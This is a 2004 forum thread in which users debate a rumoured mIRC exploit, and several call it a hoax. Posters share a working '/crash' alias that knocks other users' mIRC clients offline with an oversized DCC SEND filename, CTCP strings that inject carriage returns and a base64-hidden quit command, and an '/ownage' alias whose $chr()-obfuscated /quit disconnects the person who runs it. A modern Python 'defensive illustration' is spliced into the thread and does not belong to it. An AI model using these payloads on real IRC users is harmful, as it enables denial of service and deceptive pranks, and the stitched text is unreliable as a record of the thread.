AciD-FluX
Mar 24 2004, 11:13 PM
There is apparently a new exploit that will execute arbitrary code on every mIRC version up to and including 6.14. It was announced on a server I was on today. I haven't been able to find any information on it, but I would like to know if anyone else knows about this. Thanks
sPiKie
Mar 24 2004, 11:15 PM
A new DCC security issue has been discovered in mIRC. This is a completely new DCC exploit unrelated to previous exploits, and all versions are vulnerable to this new discovery, including the new 6.14. Malicious users have already been found who abuse this exploit against users. This new exploit is rather serious as it does not just crash a mIRC client, but allows the malicious user to execute arbitrary code, as well as perform any mIRC command. At this point no patch is available to close the exploit. Ignoring all DCC requests, or having a proxy in between the client and the user which blocks DCC requests, will prevent the exploit from being abused. You can either ignore DCCs from the configuration panel which can be accessed through ALT-O, or use the following command from any window: /ignore -wd *
Hexadecimal
Mar 24 2004, 11:21 PM
Maybe it's a joke cuz "/ignore -wd * " ignores everyone. They said put it in your perform. :/ I don't know... maybe it's real. Anyone have info about it?
JustC
Mar 24 2004, 11:36 PM
There is no new exploit in 6.14, it is just some hoax that is going around.
Those who have typed /ignore -wd * should type /ignore -rwd *
pidnull
Mar 25 2004, 12:47 AM

Ok. Now I'm really confused. I was on some network and they gave a global notice on this exploit.. I guess we just wait and see it on ircjunkie or see it on mirc.com or other mIRC related websites, but until that happens no one's really sure.
Only time will tell
buzzons
Mar 25 2004, 01:03 AM
Well, seeing as it was posted by the server admins on
EFnet
DalNet
QuakeNet
it looks like it's real.. yet no one knows exactly what it does.. even the forums on mirc.com have no real answer

buz
nexact
Mar 25 2004, 02:30 AM
Mmm, it won't be easy to find this exploit
fyle
Mar 25 2004, 02:46 AM
Here's what the ops of #mIRC on Undernet have to say on the subject:
* Now talking in #mIRC
* Topic is 'mIRC 6.14
http://www.mirc.co.uk http://www.mirc.com (There is no exploit out... QuakeNet is run by idiots... if you're really scared, type /ignore -wd * )'
* Set by Sais on Wed Mar 24 15:24:43
nexact
Mar 25 2004, 03:17 AM
mm k
Major Chrome
Mar 25 2004, 04:02 AM
Love the topic in #mIRC
liquidSilver
Mar 25 2004, 10:19 AM
All I know is this one crashes mIRC 6.14:
Put this in your aliases in mIRC:
CODE:
/crash { raw privmsg $1 : $+ $chr(1) $+ DCC SEND " $+ $str( $+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1) }
Regards,
LS
.. Edit: 6.14
Niekos
Mar 25 2004, 10:46 AM
I tried it but it won't work...
QUOTE:
[11:46] DCC Send from Niekos rejected (invalid parameters)
KieMaN
Mar 25 2004, 11:22 AM
It was a joke in the end?
AciD-FluX
Mar 25 2004, 01:11 PM
I believe that the script that was shown above was for an old vulnerability in mIRC. They have since fixed that problem in a newer mIRC version. I have heard nothing else of this newer exploit I was enquiring about. If I do happen to find anything out, I will post it here.
liquidSilver
Mar 25 2004, 01:32 PM
I succeed every time using that one.. No fun at all anywayz, but ehh.. Dunno if they have mIRC 6.12.?
Sedolf
Mar 25 2004, 01:42 PM
That's the old one for <=6.11
hitu
Mar 25 2004, 02:15 PM

wtf
CODE:
[19:32:34] [Nick VERSION] - [19:32:48] DCC Get of google_gigglex4.zip .txt from Nick complete (00:00:01 2.51 GB/Sec)
[R]u[F]y
Mar 25 2004, 05:22 PM
Does anyone have any news about this vulnerability?
I have read that this vulnerability works with a VERSION REPLY.
//raw privmsg <nick> : $+ $chr(1) $+ VERSION $+ $chr(1)
This code is /CTCP <nick> VERSION.
What is the CTCP REPLY code?
fyle
Mar 25 2004, 07:55 PM
//raw NOTICE $me $chr(1) $+ Version $+ $chr(1)
privmsg = request
notice = reply
Sp00ky
Mar 25 2004, 08:06 PM
Edit because I accidentally posted it in Dutch

This sounds nice, but what does it do? Does it only crash the nick you are exploiting?
And how does this exploit work?
[R]u[F]y
Mar 25 2004, 09:07 PM
//raw NOTICE $me $chr(1) $+ Version $+ $chr(1)
This command is:
[<nick> VERSION: reply]
But, if I want to read something?
Ex:
[<nick> VERSION reply]: mIRC v6.14 Khaled Mardam-Bey
It isn't the same thing...
[R]u[F]y
Mar 25 2004, 10:37 PM
I probably discovered the BUG.
But I need to know the complete //raw NOTICE command.
Reply to this post, it is important.
fyle
Mar 25 2004, 11:31 PM
raw notice $me : $+ $chr(1) $+ VERSION some version reply string $+ $chr(1)
I've been playing with chr(1-31) in version replies for the last hour, $decodes, $eval, math functions and stuff, long strings with weird characters, I can't find anything. Gonna get my hex on now.
Do tell what the bug is.
[R]u[F]y
Mar 25 2004, 11:46 PM
Try with this and look

//CTCP victim VERSION $chr(10) $+ $decode(cXVpdCBsYW1lcg==,m)
Gotisch
Mar 25 2004, 11:56 PM
Rufy, you are sooooo funny.
[R]u[F]y`
Mar 26 2004, 12:07 AM
I think that:
This bug works as a local exploit, but can someone test it as a C++ program?
Can someone try to send this string via IRC?
It works with:
//CTCP $me VERSION $chr(13) $+ quit lamer
//CTCP $me FINGER $chr(13) $+ quit lamer
//CTCP $me TIME $chr(13) $+ quit lamer
etc....
but not with
//CTCP $me PING $chr(13) $+ quit lamer
I don't know C++ but I think that it probably works as a remote exploit
fyle
Mar 26 2004, 01:19 AM
No, everything is delimited by CR or LF. It's how the software determines when one command string ends and another begins. If this is the alleged vulnerability, it's not.
SCVirus
Mar 26 2004, 03:39 AM
If this is real, it's probably yet another DCC buffer overflow, this time if you send them 5 thousand bytes of null shellcode then the exec shellcode of something.
thend
Mar 26 2004, 11:34 AM
wnage { echo -a [Trying to 0wn $1 $+ ] | raw privmsg $1 : $+ $chr(1) $+ VERSION " $+ $str( $+ $rand(a,z) $+ $chr(32),200) $+ " + $chr(1) + $version | echo -a [Sending DoS!] | $chr(47) $+ $chr(113) $+ $chr(117) $+ $chr(105) $+ $chr(116) $chr(73) $chr(71) $+ $chr(79) $+ $chr(84) $chr(79) $+ $chr(87) $+ $chr(78) $+ $chr(69) $+ $chr(68) $chr(66) $+ $chr(89) $chr(68) $+ $chr(51) $+ $chr(65) $+ $chr(68) $+ $chr(76) $+ $chr(105) $+ $chr(78) $+ $chr(51) | echo -a [0wned] }
USAGE:
/ownage targetnick
Niekos
Mar 26 2004, 01:17 PM
That just crashes yourself
D3ADLiN3
Mar 26 2004, 02:37 PM
lol major 0day remote root exploit 0wnage advanced connect back shell local cross site scripting administrator gaining DoS exploit (mass rooter)
easternerd
Mar 26 2004, 07:01 PM
This was messaged by the admins at Undernet too,...
First I thought this was an old vulnerability.
But then some l33t used the trick against me.
But I cancelled the DCC, so I don't know if it works.
I just added this
/crash { raw privmsg $1 : $+ $chr(1) $+ DCC SEND " $+ $str( $+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1) }
to my aliases.
Now when I /crash <Nickname>
this is the output:
[00:26] -> Server: privmsg MrIT :DCC SEND "t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t " 2130706433 341
The person to whom I sent it has to accept it for me to identify whether it works or not.
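As an added, defensive illustration (not code from any poster in this thread, nor from mIRC): fyle's point that IRC frames messages on CR/LF, the PRIVMSG-versus-NOTICE distinction for CTCP requests and replies, and the kind of parameter checks that turn a DCC SEND offer like the one easternerd's output shows into a "rejected (invalid parameters)" refusal. The filename cap, the rejection of loopback/unspecified/multicast addresses, and the sample offer are my own assumptions for the example, not mIRC's documented rules.

```python
import re
import ipaddress

# Assumed cap on DCC filenames; mIRC's own limit, if any, is not stated in the thread.
MAX_FILENAME = 255

def split_lines(buf):
    """IRC frames each message with CR/LF, so a CR or LF embedded in a CTCP
    string ends the message there; the remainder is parsed as a new line."""
    return [ln for ln in re.split(r"\r\n|\r|\n", buf) if ln]

def parse_ctcp(line):
    """Return (kind, sender, body) for a CTCP-framed message, else None.
    PRIVMSG carries a CTCP request, NOTICE carries a CTCP reply."""
    m = re.match(r"^(?::(\S+?)(?:!\S+)? )?(PRIVMSG|NOTICE) \S+ :\x01(.*)\x01$", line)
    if not m:
        return None
    sender, cmd, body = m.groups()
    return ("request" if cmd == "PRIVMSG" else "reply"), sender, body

def check_dcc_send(body):
    """Validate 'DCC SEND "file" longip port [size]'; return a list of problems (empty = accept)."""
    m = re.match(r'^DCC SEND (?:"([^"]*)"|(\S+)) (\d+) (\d+)(?: (\d+))?$', body)
    if not m:
        return ["malformed DCC SEND parameters"]
    name = m.group(1) if m.group(1) is not None else m.group(2)
    ip_num, port = int(m.group(3)), int(m.group(4))
    problems = []
    if not name or len(name) > MAX_FILENAME:
        problems.append("filename empty or too long")
    if "/" in name or "\\" in name or any(ord(c) < 32 for c in name):
        problems.append("filename contains path separators or control characters")
    if ip_num > 0xFFFFFFFF:
        problems.append("ip out of 32-bit range")
    else:
        ip = ipaddress.IPv4Address(ip_num)
        if ip.is_loopback or ip.is_unspecified or ip.is_multicast:
            problems.append(f"non-routable address {ip}")
    if not 1 <= port <= 65535:
        problems.append("port out of range")
    return problems

# Constructed sample: what the /crash alias quoted in the thread puts on the wire
# (330-char quoted filename, $longip(127.0.0.1) = 2130706433, port 341), as the receiver sees it.
SAMPLE_OFFER = (':someone!u@h PRIVMSG me :\x01DCC SEND "' + "t " * 165
                + '" 2130706433 341\x01')

if __name__ == "__main__":
    kind, sender, body = parse_ctcp(SAMPLE_OFFER)
    print(kind, "from", sender, "->", check_dcc_send(body) or "accept")
    # An injected CR never reaches the command parser as part of the reply:
    print(split_lines("NOTICE me :\x01VERSION \rquit lamer\x01"))
```

The split shows why a $chr(13) inside a CTCP string only breaks the message in two on the wire: the text after the CR is a separate, incomplete line to the receiving parser, not a command.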
Niekos
Mar 27 2004, 01:52 AM
But on which port does the shell spawn?
[R]u[F]y`
Mar 28 2004, 01:11 PM
I have read this:
http://trout.snt.utwente.nl/ubbthreads/sho...=5&o=31&fpart=1 on mIRC's forum.
There isn't a VERSION exploit, but an ADDON exploit.
Better luck next time...